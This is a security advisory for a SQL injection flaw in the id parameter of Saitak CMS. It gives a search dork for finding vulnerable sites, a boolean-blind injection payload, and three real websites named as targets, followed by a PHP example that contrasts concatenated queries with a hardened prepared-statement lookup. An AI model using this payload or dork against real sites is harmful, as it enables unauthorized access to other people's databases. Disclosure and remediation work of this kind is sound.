Saitak CMS SQL injection vulnerability

2017.11.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title : Saitak cms sql injection vulnerability
[+] Date : 2017-11-13
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://saitak.net/
[+] Dork : intext:"Designed By Saitak Design Co." inurl:php?id=
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[!] Vulnerability Files :
[*] article.php
[*] view.php
[*] news.php

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=33' AND 3774=3774 AND 'LuXu'='LuXu

[+] Target :
[!] http://navakmusic.com/news.php?id=19
[!] http://www.financialaward.ir/article.php?id=33
[!] http://nosakh.net/news.php?newsid=127
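The advisory does not show the affected source, so the following is an added example, not Saitak CMS code: it shows the query-building pattern that makes an `id` parameter injectable by the payload above, next to a hardened lookup. The `news` table, its columns, both function names and the in-memory SQLite backend are assumptions made so the example runs offline.

```php
<?php
// Added example; schema, function names and the SQLite backend are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO news (id, title) VALUES (33, 'Constructed sample article')");

// Assumed vulnerable pattern: the GET value is concatenated into the SQL text.
// A single quote in $id closes the string literal, and whatever follows it
// is parsed as part of the WHERE clause instead of as data.
function find_news_vulnerable(PDO $db, string $id): ?string
{
    $sql = "SELECT title FROM news WHERE id = '" . $id . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// Hardened lookup: accept only a short run of digits, then bind the value
// as an integer parameter so it can never change the statement's structure.
function find_news_hardened(PDO $db, string $id): ?string
{
    if (!ctype_digit($id) || strlen($id) > 9) {
        return null; // not a plain numeric id: refuse before touching the database
    }
    $stmt = $db->prepare("SELECT title FROM news WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// The payload string quoted in the advisory, and a legitimate id for comparison.
$payload = "33' AND 3774=3774 AND 'LuXu'='LuXu";

// Concatenated query: the injected AND conditions are evaluated by the database.
var_dump(find_news_vulnerable($db, $payload));
// Validated and bound: the same input is rejected as a non-numeric id.
var_dump(find_news_hardened($db, $payload));
// A normal request still resolves.
var_dump(find_news_hardened($db, '33'));
```

The same validation and binding would apply to each of the files the advisory lists, since they share the `id` parameter.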



Copyright 2017, cxsecurity.com